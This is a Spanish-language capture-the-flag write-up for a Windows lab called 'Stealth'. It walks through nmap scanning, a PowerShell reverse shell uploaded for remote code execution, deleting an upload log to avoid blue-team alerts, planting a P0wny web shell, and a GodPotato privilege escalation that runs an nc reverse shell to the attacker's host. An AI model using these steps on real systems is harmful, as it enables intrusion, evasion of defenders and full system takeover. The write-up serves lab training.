🥷Stealth (Windows)

Use your evasion skills to pwn a Windows target with an updated defence mechanism.

Enumeración de Red

Nmap

Scan general y específico de servicios
sudo nmap -sS --min-rate 5000 -p- --open -n -Pn 10.10.131.99 -oN puertos
nmap -sCV -p139,445,3389,5985,7680,8000,8080,8443,47001,49664,49665,49666,49667,49668,49670,49672 10.10.131.99 -oN nmap

Resultado nmap

PORT      STATE    SERVICE       VERSION
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HOSTEVASION
|   NetBIOS_Domain_Name: HOSTEVASION
|   NetBIOS_Computer_Name: HOSTEVASION
|   DNS_Domain_Name: HostEvasion
|   DNS_Computer_Name: HostEvasion
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-03T11:00:29+00:00
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2025-08-02T10:53:10
|_Not valid after:  2026-02-01T10:53:10
|_ssl-date: 2025-08-03T11:01:08+00:00; +1s from scanner time.
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  filtered pando-pub
8000/tcp  open     http          PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp  open     http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp  open     ssl/http      Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-title: PowerShell Script Analyser
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
49672/tcp open     msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-03T11:00:29
|_  start_date: N/A

Sistema Windows

Enumeración SMB/RPC - Null Session

smbclient -L //10.10.131.99 -N

Access denied

rpcclient -U "" 10.10.131.99 -N

Access denied

Enumeración de Servicio Web

http://10.10.131.99:8000/

Not Found The requested resource / was not found on this server.

http://10.10.131.99:8080/

8080/tcp  open - http - Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser

PowerShell Script Analyser Please upload any .ps1 PowerShell script to see if it is malicious or not (Dev Mode). The tool is in dev-mode and only allow .ps1 format at this stage.

PowerShell Reverse Shell en archivo .ps1 malicioso?

Explotación: File Upload a RCE

PowerShell Reverse Shell Interactiva

Establecer Listener
nc -lvnp <port>
  • Subir archivo > Ejecución automática

Intrusión en el Sistema

Shell: hostevasion\evader

Enumeración Post-Intrusión

C:\Users\evader\desktop\encodedflag

Decodificar contenido de encodedflag
echo "encodedflag" | base64 -d

You can get the flag by visiting the link http://<IP_OF_THIS_PC>:8000/asdasdadasdjakjdnsdfsdfs.php

http://10.10.131.99:8000/asdasdadasdjakjdnsdfsdfs.php

Hey, seems like you have uploaded invalid file. Blue team has been alerted. Hint: Maybe removing the logs files for file uploads can help?

Obtención de User Flag

C:\Users\evader\documents\task\file.ps1

Línea que especifica almacenamiento web
$FolderPath = "C:\xampp\htdocs\uploads\"

C:\xampp\htdocs\uploads\

  • log.txt

Eliminación del log de subidas
rm C:\xampp\htdocs\uploads\log.txt

Flag: http://10.10.131.99:8000/asdasdadasdjakjdnsdfsdfs.php

Enumeración de Superficie

Comprobar grupos y privilegios
whoami /all
  • builtin\Users

  • Ningún privilegio útil

Comprobar permisos de directorio web raíz
cd C:\xampp\htdocs\
icacls .
  • builtin\Users: (F)

Las instalaciones XAMPP en Windows, registran Apache como servicio bajo la cuenta LocalSystem, cuyo token incorpora de forma nativa el privilegio SeImpersonatePrivilege Al desplegar una webshell en el directorio raíz de la aplicación y ejecutarla vía HTTP, el intérprete PHP se carga en el contexto del proceso de Apache, heredando íntegramente el token con el privilegio SeImpersonate habilitado.

Desplegando P0wny-Shell

Alojar shell en servidor
python3 -m http.server
Descargar en directorio raíz
cd C:\xampp\htdocs\
wget http://<ip-a>/pony.php pony.php

webshell: http://10.10.131.99:8080/pony.php

Enumerar privilegios
whoami /priv

Nuevo privilegio en contexto de servicio

Privilege Name           Description                                State
=======================  =========================================  ========
SeImpersonatePrivilege   Impersonate a client after authentication  Enabled

Escalada de Privilegios - SeImpersonate Privilege

Escalada con RogueWinRM

Comprobar status de winrm
winrm enumerate winrm/config/listener

WinRM está en ejecución

Status   Name               DisplayName
------   ----               -----------
Running  WinRM              Windows Remote Management (WS-Manag...

No vulnerable a RogueWinRM

Escalada con GodPotato

Potato privilege escalation is usually used when we obtain WEB/database privileges. We can elevate a service user with low privileges to “NT AUTHORITY\SYSTEM” privileges.

Alojar shell en servidor
python3 -m http.server
Descargar en directorio raíz
cd C:\xampp\htdocs\
wget http://<ip-a>/potato.exe potato.exe

webshell: http://10.10.131.99:8080/pony.php

Reverse Shell mediante GodPotato
potato.exe -cmd "nc -t -e C:\Windows\System32\cmd.exe <ip-a> <port>"

Compromiso del Sistema

Shell: NT AUTHORITY\SYSTEM

Última actualización